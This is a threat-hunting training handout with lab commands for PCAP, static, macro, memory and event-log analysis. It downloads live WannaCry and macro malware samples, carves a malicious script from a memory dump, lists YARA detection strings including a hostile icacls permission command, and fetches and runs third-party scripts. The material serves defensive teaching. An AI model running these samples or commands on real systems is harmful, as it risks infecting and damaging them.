1 #####################################
2----------- ############### # Day 1: Threat Hunting on the wire ################ -----------
3 #####################################
4
5
6###################################
7# Setting up your virtual machine #
8# Note: run as root user #
9###################################
10
11
Here is where we will set up all of the required dependencies for the tools we plan to install.
13---------------------------Type This-----------------------------------
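# Build and analysis dependencies (run as root). apt-get is used for both
# steps because `apt` has no stable scripting interface; the duplicated
# libpcap-dev and zlib1g-dev entries of the original line are dropped.
apt-get update
apt-get install -y \
  libpcre3-dbg libpcre3-dev autoconf automake libtool libpcap-dev libnet1-dev \
  libyaml-dev libjansson4 libcap-ng-dev libmagic-dev libjansson-dev zlib1g-dev \
  libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev cmake make gcc g++ \
  flex bison libssl-dev unzip python-dev swig sendmail sendmail-bin prads \
  tcpflow python-scapy python-yara tshark whois jq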
16-----------------------------------------------------------------------
17
18
19
20
21Now we install Suricata
22---------------------------Type This-----------------------------------
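# Build Suricata 4.0.5 from source and install it under /usr, /etc, /var
# (run as root).
wget https://www.openinfosecfoundation.org/download/suricata-4.0.5.tar.gz
# If the publisher provides a checksum or signature for this tarball, verify
# it before building: whatever is in the archive becomes root-owned binaries.
tar -zxvf suricata-4.0.5.tar.gz
cd suricata-4.0.5
./configure --enable-nfqueue --prefix=/usr --sysconfdir=/etc --localstatedir=/var
make
make install
make install-conf
# Rules shipped in the source tree, then the ET Open ruleset for 4.0.
# `--` stops cp from treating an oddly named rule file as an option.
cp -- rules/*.rules /etc/suricata/rules/
cd /etc/suricata/
wget https://rules.emergingthreats.net/open/suricata-4.0/emerging.rules.tar.gz
tar -zxvf emerging.rules.tar.gz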
46-----------------------------------------------------------------------
47
48
49
50
51
52##################################################################
53# Analyzing a PCAP Prads #
54# Note: run as regular user #
55##################################################################
56
57---------------------------Type This-----------------------------------
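# Passive host fingerprinting of the capture with PRADS (regular user).
# mkdir -p lets the section be re-run without "File exists" errors.
cd ~
mkdir -p pcap_analysis/prads
cd ~/pcap_analysis/prads
wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
# -r reads the pcap instead of sniffing an interface; -l names the asset log.
prads -r suspicious-time.pcap -l prads-asset.log
less prads-asset.log
# OS guesses from SYN fingerprints, then client and server software.
# grep reads the log directly; the `cat |` of the original was redundant.
grep SYN prads-asset.log | grep -iE 'windows|linux'
grep CLIENT prads-asset.log | grep -iE 'safari|firefox|opera|chrome'
grep SERVER prads-asset.log | grep -iE 'apache|linux|ubuntu|nginx|iis'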
78cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
79-----------------------------------------------------------------------
80
81
82
83
84##################################
85# PCAP Analysis with ChaosReader #
86# Note: run as regular user #
87##################################
88---------------------------Type This-----------------------------------
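# Reassemble sessions from the capture with ChaosReader (regular user).
cd ~
mkdir -p pcap_analysis/chaos_reader/
cd ~/pcap_analysis/chaos_reader/
wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
# chaosreader.pl is fetched from a third-party bucket and then executed:
# read it (or diff it against the upstream release) before running it.
wget https://s3.amazonaws.com/infosecaddictsfiles/chaosreader.pl
perl chaosreader.pl suspicious-time.pcap
# Session summary lines from index.text (rows without a double quote,
# starting at the first IPv4 address).
grep -v '"' index.text | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
# The same rows reduced to fields 4-6 and counted, most frequent first.
grep -v '"' index.text | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr

# One "src --> dst = host" line per reassembled HTTP session. $(...) replaces
# the backticks and every expansion is quoted so an odd Host value cannot be
# word-split; the per-file `cat` pipes are gone.
for f in session_00[0-9]*.http.html; do
  srcip=$(grep 'http: ' "$f" | awk '{print $2}' | cut -d ':' -f1)
  dstip=$(grep 'http: ' "$f" | awk '{print $4}' | cut -d ':' -f1)
  host=$(grep 'Host: ' "$f" | sort -u | sed -e 's/Host: //g')
  printf '%s --> %s = %s\n' "$srcip" "$dstip" "$host"
done | sort -u

# Serves this directory (the pcap, every reconstructed session and any carved
# payload) on all interfaces, port 8000, with no authentication. Only do this
# on the isolated lab network and stop it with Ctrl-C when you are done.
python -m SimpleHTTPServer
# Then open http://<ip-of-your-linux-vm>:8000/ in a browser to view the pages.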
110
111------------------------------------------------------------------------
112
113
114
115
116
117
118
119
120#############################
121# PCAP Analysis with tshark #
122# Note: run as regular user #
123#############################
124---------------------------Type This-----------------------------------
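# Protocol, host and HTTP statistics from the capture with tshark (regular user).
cd ~/pcap_analysis/
mkdir -p tshark
cd ~/pcap_analysis/tshark
wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
# -i selects a live-capture interface (and may need capture privileges);
# with -r the input is the file, so the option is dropped here.
tshark -r suspicious-time.pcap -qz io,phs
tshark -r suspicious-time.pcap -qz ip_hosts,tree
# Distinct (source, User-Agent) pairs in first-seen order. A bare `uniq`
# only collapses adjacent repeats; the awk filter removes every repeat.
tshark -r suspicious-time.pcap -Y "http.request" -T fields -e "ip.src" -e "http.user_agent" | awk '!seen[$0]++'
tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"

# Every HTTP request as "src -> dst : http://host/uri". Defined once because
# the same pipeline is filtered three different ways below.
http_urls() {
  tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \
    | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
}
http_urls

# Registration data for two of the contacted domains. whois queries go out in
# clear text and are visible to the registry you ask.
whois rapidshare.com.eyu32.ru
whois sploitme.com.cn

# The request list without images/css/icons and without the google and
# honeynet.org hosts.
http_urls | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
tshark -r suspicious-time.pcap -qz http_req,tree
# Frames whose text payload contains an inline <script> tag.
tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
# Requests involving 10.0.3.15 only, with long query strings shortened to "?...".
http_urls | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'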
154tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
155------------------------------------------------------------------------
156
157
158
159
160
161
162
163###############################
164# PCAP Analysis with Suricata #
165# Note: run as root #
166###############################
167---------------------------Type This-----------------------------------
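# Replay the capture through Suricata with the installed ruleset (run as root).
# The lab user's home is spelled out because root's ~ is /root; change
# lab_home if your account is not "joe". Files written below are root-owned,
# so chown them if later sections run as the regular user.
lab_home=/home/joe
cd "$lab_home/pcap_analysis/"
mkdir -p suricata/suri
cd suricata/
wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
suricata -c /etc/suricata/suricata.yaml -r suspicious-time.pcap -l suri/
cd suri/
less stats.log
# Keep only the HTTP events of eve.json, print timestamp + http object, and
# split the stream into xx00, xx01, ... at each timestamp line. The csplit
# pattern and repeat count are quoted so the shell cannot glob them.
grep -E 'e":"http' eve.json | jq '.timestamp,.http' | csplit - '/..T..:/' '{*}'
cat xx01
cat xx02
cat xx03
cat xx04
cat xx05
cat xx06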
196cat xx06
197------------------------------------------------------------------------
198
199
200#############################
201# PCAP Analysis with Yara #
202# Note: run as regular user #
203#############################
204---------------------------Type This-----------------------------------
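# Scan the capture's flows with the community YARA ruleset via YaraPcap.
cd ~/pcap_analysis/
# Neither the tool nor the rules are pinned to a version: record the commit
# and the zip you used so the run is reproducible, and read index_gen.sh
# before executing it.
git clone https://github.com/kevthehermit/YaraPcap.git
cd YaraPcap/
wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
wget https://github.com/Yara-Rules/rules/archive/master.zip
unzip master.zip
cd rules-master/
ls
cat index.yar
clear
./index_gen.sh
cd ..
mkdir -p matching_files/
# First attempt; it may fail until yaraPcap.py points at the real tcpflow.
python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/
# Print the tcpflow path (command -v gives just the executable, unlike whereis).
command -v tcpflow
# Edit yaraPcap.py (the handout points at line 35) so its tcpflow path
# matches the output above, save, then rerun the scan.
vi yaraPcap.py
python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/
cd matching_files/
ls
cat report.txt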
226------------------------------------------------------------------------
227
228
229
230 ###############################################
231----------- ############### # Day 2: Threat Hunting with Static Analysis ################ -----------
232 ###############################################
233
234
235
236
237###################################
238# Setting up your virtual machine #
239###################################
240
Here is where we will set up all of the required dependencies for the tools we plan to install.
242---------------------------Type This-----------------------------------
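# Dependencies for the static-analysis tools. `build-dep` is an apt-get
# subcommand, not a package, so the original single install line fails as a
# whole ("Unable to locate package build-dep"); it is split out here, and the
# duplicated python-mysqldb entry is dropped. build-dep needs deb-src lines
# in sources.list.
sudo apt-get update
sudo apt-get install -y \
  python3-pip python3-dev unzip python3-setuptools ipython3 build-essential \
  python-pefile python2.7 python-pip python-setuptools mysql-server python-mysqldb
sudo apt-get build-dep -y python-mysqldb

# Installs into the system Python as root; a virtualenv or `pip install
# --user` keeps lab tooling out of the system site-packages.
sudo pip install -U olefile

# The `pe` CLI from source. The setup.py step already installs it; the
# `pip3 install .` that follows is kept only because the handout used both.
git clone https://github.com/Te-k/pe.git
cd pe
sudo python3 setup.py install
pip3 install .
cd ..
# Live ransomware sample, zipped with the password "infected". You are asked
# for that password by unzip later; the bare word is not a command.
wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip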
256 infected
257-----------------------------------------------------------------------
258
259
260
261
262################
263# The Scenario #
264################
265You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
266
267
268The fastest thing you can do is perform static analysis.
269
270
271
272###################
273# Static Analysis #
274###################
275
- After logging in, please open a terminal window and type the following commands:
277
278
279---------------------------Type This-----------------------------------
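# Unpack the sample and look at what it really is (regular user, isolated VM).
cd ~
mkdir -p static_analysis
cd static_analysis
wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
# Enter the archive password "infected" at the prompt; typing it at the
# prompt rather than on the command line keeps it out of history and `ps`.
unzip wannacry.zip
file wannacry.exe
# file(1) classifies by content, not by extension, so renaming the sample
# should not change its verdict - which is why extension filters are weak.
mv wannacry.exe malware.pdf
file malware.pdf
mv malware.pdf wannacry.exe
# First two bytes: the DOS header magic "MZ" (4d 5a).
hexdump -n 2 -C wannacry.exe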
300
301----------------------------------------------------------------------
302
303
304***What is '4d 5a' or 'MZ'***
305Reference:
306http://www.garykessler.net/library/file_sigs.html
307
308
309
310
311---------------------------Type This-----------------------------------
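# Header/section dump, then keyword triage over the printable strings.
objdump -x wannacry.exe
# strings runs once and is saved (tee also shows it on screen) so the binary
# is not re-scanned for each keyword. Default strings output is 8-bit text
# only; rerun with `strings -e l` to see the UTF-16LE ("wide") strings that
# Windows binaries use heavily.
strings wannacry.exe | tee wannacry.strings.txt
for kw in dll library reg key rsa open get mutex irc join admin list; do
  printf '== %s ==\n' "$kw"
  # `--` keeps a keyword from ever being parsed as a grep option.
  grep -i -- "$kw" wannacry.strings.txt
done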
339----------------------------------------------------------------------
340
341
342
343
344
345---------------------------Type This-----------------------------------
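# Section-level view with the `pe` tool. The original read strings from an
# "rdata" dump it never produced, so that section is dumped as well.
pe info wannacry.exe
pe check wannacry.exe
pe dump --section text wannacry.exe
pe dump --section data wannacry.exe
pe dump --section rdata wannacry.exe
pe dump --section rsrc wannacry.exe
pe dump --section reloc wannacry.exe
# Assumes `pe dump` writes each section to a file named after it, as the
# original commands imply; check with `ls` if strings reports a missing file.
strings rdata | less
strings rsrc | less
strings text | less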
354strings text | less
355----------------------------------------------------------------------
356
357
358
359
360
361
362
363
364Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
365
Quick Google search for "wannacry ransomware analysis"
367
368
369Reference
370https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
371
372- Yara Rule -
373
374
375Strings:
$s1 = "Ooops, your files have been encrypted!" wide ascii nocase
$s2 = "Wanna Decryptor" wide ascii nocase
$s3 = ".wcry" wide ascii nocase
$s4 = "WANNACRY" wide ascii nocase
$s5 = "WANACRY!" wide ascii nocase
$s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
382
383
384
385
386
387
388
389
390Ok, let's look for the individual strings
391
392
393---------------------------Type This-----------------------------------
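# Check the rule's strings one at a time. Default strings output is 8-bit
# text only; rerun with `strings -e l` to test the "wide" (UTF-16LE) form.
strings wannacry.exe | grep -i ooops
strings wannacry.exe | grep -i wanna
strings wannacry.exe | grep -i wcry
strings wannacry.exe | grep -i wannacry
# The original line had the remark "**** Matches $s5, hmmm....." on the
# command itself: `****` would glob every file in the directory into grep's
# arguments and $s5 would expand to nothing, so it lives in a comment now.
strings wannacry.exe | grep -i wanacry   # matches $s5 ("WANACRY!"), hmmm.....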
403----------------------------------------------------------------------
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420####################################
421# Tired of GREP - let's try Python #
422####################################
I decided to make my own script for this kind of stuff in the future.
424
425Reference1:
426https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
427
428This is a really good script for the basics of static analysis
429
430Reference:
431https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
432
433
434This is really good for showing some good signatures to add to the Python script
435
436
437Here is my own script using the signatures (started this yesterday, but still needs work):
438https://pastebin.com/guxzCBmP
439
440
441
442---------------------------Type This-----------------------------------
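# Fetch the author's work-in-progress triage script straight into am.py
# (-O replaces the separate mv). It comes from a pastebin and is then
# executed, so the `vi` step is where you read it before running it.
wget -O am.py https://pastebin.com/raw/guxzCBmP
vi am.py
python2.7 am.py wannacry.exe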
452----------------------------------------------------------------------
453
454
455
456##############
457# Yara Ninja #
458##############
459
460Reference:
461https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
462
463----------------------------------------------------------------------------
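// Attributed rule (see meta.author). Fires on any single one of the ransom
// note / marker strings; "wide ascii nocase" covers both UTF-16LE and 8-bit
// forms in either case. The identifiers skip $s6 as published.
rule wannacry_1 : ransom
{
    meta:
        author = "Joshua Cannell"
        description = "WannaCry Ransomware strings"
        weight = 100
        date = "2017-05-12"

    strings:
        $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
        $s2 = "Wanna Decryptor" wide ascii nocase
        // Short strings such as ".wcry" may also hit benign files that merely
        // mention the extension; treat a lone $s3 hit as a lead, not a verdict.
        $s3 = ".wcry" wide ascii nocase
        $s4 = "WANNACRY" wide ascii nocase
        $s5 = "WANACRY!" wide ascii nocase
        $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase

    condition:
        any of them
}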
483
484----------------------------------------------------------------------------
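// Attributed rule (see meta.author). Matches the per-language ransom-note
// resource names the sample carries; any one of them is enough to fire.
// These strings are ASCII-only and case-sensitive as published.
rule wannacry_2 {
    meta:
        author = "Harold Ogden"
        description = "WannaCry Ransomware Strings"
        date = "2017-05-12"
        weight = 100

    strings:
        $string1 = "msg/m_bulgarian.wnry"
        $string2 = "msg/m_chinese (simplified).wnry"
        $string3 = "msg/m_chinese (traditional).wnry"
        $string4 = "msg/m_croatian.wnry"
        $string5 = "msg/m_czech.wnry"
        $string6 = "msg/m_danish.wnry"
        $string7 = "msg/m_dutch.wnry"
        $string8 = "msg/m_english.wnry"
        $string9 = "msg/m_filipino.wnry"
        $string10 = "msg/m_finnish.wnry"
        $string11 = "msg/m_french.wnry"
        $string12 = "msg/m_german.wnry"
        $string13 = "msg/m_greek.wnry"
        $string14 = "msg/m_indonesian.wnry"
        $string15 = "msg/m_italian.wnry"
        $string16 = "msg/m_japanese.wnry"
        $string17 = "msg/m_korean.wnry"
        $string18 = "msg/m_latvian.wnry"
        $string19 = "msg/m_norwegian.wnry"
        $string20 = "msg/m_polish.wnry"
        $string21 = "msg/m_portuguese.wnry"
        $string22 = "msg/m_romanian.wnry"
        $string23 = "msg/m_russian.wnry"
        $string24 = "msg/m_slovak.wnry"
        $string25 = "msg/m_spanish.wnry"
        $string26 = "msg/m_swedish.wnry"
        $string27 = "msg/m_turkish.wnry"
        $string28 = "msg/m_vietnamese.wnry"

    condition:
        // ($string*) is every identifier above; equivalent to "any of them" here.
        any of ($string*)
}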
526----------------------------------------------------------------------------
527
528
529
530
531
532
533
534#####################################################
535# Analyzing Macro Embedded Malware #
536#####################################################
537---------------------------Type This-----------------------------------
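# Pull the macro streams out of the Word sample with oledump (isolated VM).
mkdir -p ~/oledump
cd ~/oledump
# Plain-HTTP download of a tool you will execute: if the author publishes a
# hash for the zip, compare it before unzipping.
wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
unzip oledump_V0_0_22.zip
wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
# Enter the archive password "infected" at the prompt (the bare word on the
# next line of the original handout is that answer, not a command).
unzip 064016.zip
# Stream listing, then stream A4 with -v (decompress the VBA source).
python oledump.py 064016.doc
python oledump.py 064016.doc -s A4 -v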
554 -----------------------------------------------------------------------
555
556
557
558- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
559- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
560
561---------------------------Type This-----------------------------------
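# Stream A5 (VBA/ThisDocument in the listing) with the VBA decompressed.
python oledump.py 064016.doc -s A5 -v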
563-----------------------------------------------------------------------
564
565- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
566
567---------------------------Type This-----------------------------------
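# Stream A3 (VBA/Module1) decompressed; the hex blob discussed below is in
# this output. Decode it with a converter - do not execute anything from it.
python oledump.py 064016.doc -s A3 -v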
569
570- Look for "GVhkjbjv" and you should see:
571
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
573
574- Take that long blob that starts with 636D and finishes with 653B and paste it in:
575http://www.rapidtables.com/convert/number/hex-to-ascii.htm
576-----------------------------------------------------------------------
577
578
579
580###############################
581# Creating a Malware Database #
582###############################
583Creating a malware database (mysql)
584-----------------------------------
585- Step 1: Logging in
586Run the following command in the terminal:
587---------------------------Type This-----------------------------------
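# Create the database non-interactively (-e replaces the interactive prompt;
# the root password is asked for by -p). The handout's MySQL root password
# is "malware" - fine only inside the throw-away lab VM, and the same value
# goes into mal_to_db.py below.
mysql -u root -p -e 'create database malware;'

# mal_to_db.py is fetched from an unpinned third-party branch and then run
# with your DB credentials: read it before running it.
wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
# Fill in the database connection information (host, user, password, db).
vi mal_to_db.py
# -i is the handout's initialisation run; it should create the files table.
python mal_to_db.py -i

# Check that the files table was created (password at the prompt again).
mysql -u root -p -e 'show databases; use malware; show tables; describe files;'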
616
617---------------------------------
618
619
620- Now add the malicious file to the DB
621---------------------------Type This-----------------------------------
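# Hash and record the sample (-f file, -u as used in the handout). Run it in
# the directory that holds wannacry.exe (~/static_analysis from Day 2).
python mal_to_db.py -f wannacry.exe -u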
623
624
625
626- Now check to see if it is in the DB
627---------------------------Type This-----------------------------------
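# Confirm the sample was recorded. The database name after -e replaces the
# interactive `use malware;`; the password is entered at the prompt.
mysql -u root -p -e 'select id,md5,sha1,sha256,time FROM files;' malware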
636-----------------------------------------------------------------------
637
638
639
640
641 ###############################################
642----------- ############### # Day 3: Threat hunting with memory analysis ################ -----------
643 ###############################################
644
645
646
647
648
649###################################
650# Setting up your virtual machine #
651###################################
652
Here is where we will set up all of the required dependencies for the tools we plan to install.
654---------------------------Type This-----------------------------------
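# Memory-analysis tooling (run as root). apt-get for both steps: `apt`
# has no stable scripting interface.
apt-get update
apt-get install -y \
  foremost tcpxtract python-openpyxl python-ujson python-ujson-dbg \
  python-pycryptopp python-pycryptopp-dbg libdistorm3-3 libdistorm3-dev \
  python-distorm3 volatility volatility-tools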
657-----------------------------------------------------------------------
658
659
660
661
662################
663# The Scenario #
664################
665
666
667###################
668# Memory Analysis #
669###################
670---------------------------Type This-----------------------------------
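# Memory analysis of the sample image with Volatility 2 (regular user).
cd ~/
mkdir -p mem_analysis
cd mem_analysis
wget https://s3.amazonaws.com/infosecaddictsfiles/hn_forensics.vmem
# Process list, then the same reduced to columns 2-4 (name, PID, PPID in
# Volatility 2's layout), once plainly and once tab-padded.
volatility pslist -f hn_forensics.vmem
volatility pslist -f hn_forensics.vmem | awk '{print $2,$3,$4}'
volatility pslist -f hn_forensics.vmem | awk '{print $2,"\t\t"$3"\t\t","\t\t"$4}'
# Carved connection objects; -w matches 888 and 1752 as whole words so that
# e.g. 1888 or 17520 do not slip in (the original substring grep let them).
volatility connscan -f hn_forensics.vmem
volatility connscan -f hn_forensics.vmem | grep -wE '888|1752'

mkdir -p malfind/ dump/ output/pdf/

volatility privs -f hn_forensics.vmem
volatility svcscan -f hn_forensics.vmem
# malfind writes the suspected injected regions to malfind/; those files come
# out of a compromised image, so treat them as hostile.
volatility malfind -f hn_forensics.vmem --dump-dir malfind/

# Full process memory for PIDs 888 and 1752 - takes a few minutes.
volatility -f hn_forensics.vmem memdump -p 888 --dump-dir dump/
volatility -f hn_forensics.vmem memdump -p 1752 --dump-dir dump/

cd dump/
# URLs in the 1752 dump: `sort -u` replaces `sort | uniq`. The second line
# keeps the original `uniq -u` (lines without an adjacent duplicate).
strings 1752.dmp | grep "^http://" | sort -u
strings 1752.dmp | grep "Ahttps://" | uniq -u

# Carve PDFs out of the dump and look for embedded JavaScript.
foremost -i 1752.dmp -t pdf -o ../output/pdf/
cd ../output/pdf/
cat audit.txt
cd pdf
ls
grep -i javascript *.pdf

# pdf-parser arrives over plain HTTP: if the author publishes a hash for the
# zip, compare it before unpacking.
wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
unzip pdf-parser_V0_6_4.zip
# 00601560.pdf is the carved file name from the handout's foremost run;
# adjust it if yours differs. Objects 11 and 1054 are the ones it follows.
python pdf-parser.py -s javascript --raw 00601560.pdf
python pdf-parser.py --object 11 00601560.pdf
# The decoded object is the malicious script: read it, never run it.
python pdf-parser.py --object 1054 --raw --filter 00601560.pdf > malicious.js

cat malicious.js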
718 -----------------------------------------------------------------------
719
720
721
722 ############################################
723----------- ############### # Day 4: Threat Hunting with log analysis ################ -----------
724 ############################################
725
726#####################
727# Powershell Basics #
728#####################
729
PowerShell is Microsoft's scripting language and shell; it has been built into Windows since the release of Vista.
731
PowerShell script files use the .ps1 extension.
733
734An important note is that you cannot double click on a PowerShell script to execute it.
735
736To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
737
738------------------------Type This------------------------------
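# Move to the drive root and list it twice: `dir` and `ls` are both aliases of
# Get-ChildItem. Note what a bare `cd` does here compared with cmd.exe.
cd c:\
dir
cd
ls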
743---------------------------------------------------------------
744
745
746To obtain a list of cmdlets, use the Get-Command cmdlet
747------------------------Type This------------------------------
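# Every cmdlet, function and alias the session can see.
Get-Command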
749---------------------------------------------------------------
750
751
752You can use the Get-Alias cmdlet to see a full list of aliased commands.
753------------------------Type This------------------------------
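# Alias -> cmdlet table (e.g. ls/dir -> Get-ChildItem, ? -> Where-Object).
Get-Alias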
755---------------------------------------------------------------
756
757
Don't worry, you won't blow up your machine with PowerShell.
759------------------------Type This------------------------------
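# Shown only to set up the -WhatIf lesson. Without -WhatIf the first line
# would try to stop every process on the box (your shell included), so it is
# commented out here - do NOT run it as written. Ask yourself what it would do.
# Get-Process | stop-process
# -WhatIf reports what each Stop-Process call would do without doing it.
Get-Process | stop-process -whatif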
762---------------------------------------------------------------
763
764To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
765------------------------Type This------------------------------
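# Built-in help, then the online page for Get-Service. The original used a
# typographic dash (U+2013) before -online and -N; PowerShell accepts it, but
# an ASCII hyphen survives copy/paste through editors and SSH sessions that
# do not. -N is the unambiguous prefix of -Name.
Get-Help Get-Command

Get-Help Get-Service -online

Get-Service -Name TermService, Spooler

Get-Service -N BITS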
773---------------------------------------------------------------
774
775
776
777
778
- Run a cmdlet through a pipe and refer to each object's properties as $_
780------------------------Type This------------------------------
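# Only the services whose Status property is Running; $_ is the current object.
Get-Service | where-object { $_.Status -eq "Running"}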
782---------------------------------------------------------------
783
784
785
786- PowerShell variables begin with the $ symbol. First lets create a variable
787------------------------Type This------------------------------
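# Keep the Spooler service object in $serv. ASCII hyphen before -N; the
# original carried a typographic dash (U+2013), which PowerShell tolerates
# but other tools may not.
$serv = Get-Service -N Spooler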
789---------------------------------------------------------------
790
791To see the value of a variable you can just call it in the terminal.
792------------------------Type This------------------------------
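# Print the object, then the .NET type behind it.
$serv

$serv.gettype().fullname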
796---------------------------------------------------------------
797
798
799Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
800------------------------Type This------------------------------
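# The object's methods and properties, via the pipeline and via -InputObject.
$serv | Get-Member

Get-Member -InputObject $serv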
804---------------------------------------------------------------
805
806
807
808
809Let's use a method and a property with our object.
810------------------------Type This------------------------------
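# Read a property, then call methods that change machine state: Stop()/Start()
# on the Spooler typically need an elevated session. Refresh() re-reads the
# status from the service manager before each check.
$serv.Status
$serv.Stop()
$serv.Refresh()
$serv.Status
$serv.Start()
$serv.Refresh()
$serv.Status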
818---------------------------------------------------------------
819
820
821If you want some good command-line shortcuts you can check out the following link:
822https://technet.microsoft.com/en-us/library/ff678293.aspx
823
824#############################
825# Simple Event Log Analysis #
826#############################
827
828Step 1: Dump the event logs
829---------------------------
830The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
831
To dump the event log, you can use the Get-EventLog and the Export-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
If you need to work with one of the trace logs, use the Get-WinEvent and the Export-Clixml cmdlets.
834------------------------Type This------------------------------
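# Export the Application log to CLIXML for offline parsing, then view it.
Get-EventLog -LogName application | Export-Clixml Applog.xml

type .\Applog.xml

# Logs to export in bulk in the next step. Reading Security needs an elevated
# session, and the XML keeps none of the log's own protection - only the
# NTFS/share ACLs of the folder it is written to.
$logs = "system","application","security"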
840---------------------------------------------------------------
841
842
843The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
844------------------------Type This------------------------------
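# % is Foreach-Object: export each named log to <name>.xml in the current folder.
$logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }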
846---------------------------------------------------------------
847
848
849
850
851Step 2: Import the event log of interest
852----------------------------------------
853To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
854Store the results in a variable.
Let's take a look at the cmdlets Where-Object, Group-Object, and Select-Object.
856
857The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
858------------------------Type This------------------------------
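# Load the exported Security log back into objects, then show the last five
# entries of the collection.
$seclog = Import-Clixml security.xml

$seclog | select -Last 5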
862---------------------------------------------------------------
863
864Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
865------------------------Type This------------------------------
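# Application log entries newer than 24 hours ago (-After takes a DateTime).
Get-EventLog Application -After (Get-Date).AddDays(-1)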
867---------------------------------------------------------------
868You can use '-after' and '-before' to filter date ranges
869
One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NTFS and share permissions that are assigned to the location where you store everything.
871By default, an ordinary user does not have permission to read the security log.
872
873
874
875
876Step 3: Drill into a specific entry
877-----------------------------------
878To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
879
880------------------------Type This------------------------------
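# First entry with every property expanded (fl is Format-List).
$seclog | select -first 1 | fl *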
882---------------------------------------------------------------
883
884The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
885
886------------------------Type This------------------------------
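# The Message property of the first entry, then its .NET type (a string).
($seclog | select -first 1).message

(($seclog | select -first 1).message).gettype()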
890---------------------------------------------------------------
891
892
893In the *nix world you often want a count of something (wc -l).
894How often is the SeSecurityPrivilege privilege mentioned in the message property?
895To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
896------------------------Type This------------------------------
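# Count entries whose message mentions SeSecurityPrivilege (? is Where-Object,
# measure is Measure-Object).
$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure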
898---------------------------------------------------------------
899If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.
900
901------------------------Type This------------------------------
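# Same filter, grouped by EventID so you can see which event types carry it.
$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid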
903---------------------------------------------------------------
904
905Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
906Use the count property to determine the total number of entries in the event log.
907------------------------Type This------------------------------
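# Total number of imported entries (the import yields a collection).
$seclog.Count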
909---------------------------------------------------------------
910
911
912
913
914
915############################
916# Simple Log File Analysis #
917############################
918
919
You'll need to create the directory c:\ps and download the sample IIS log http://pastebin.com/raw.php?i=LBn64cyA
921
922------------------------Type This------------------------------
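# Working folder plus two sample logs. Both downloads are plain HTTP through
# WebClient, so the content could be altered in transit; the
# https://pastebin.com/raw/<id> form used elsewhere in this handout avoids that.
mkdir c:\ps
cd c:\ps
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
# Every line mentioning one host of interest.
Select-String 192.168.208.63 .\CiscoLogFileExamples.txt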
928---------------------------------------------------------------
929
930
931
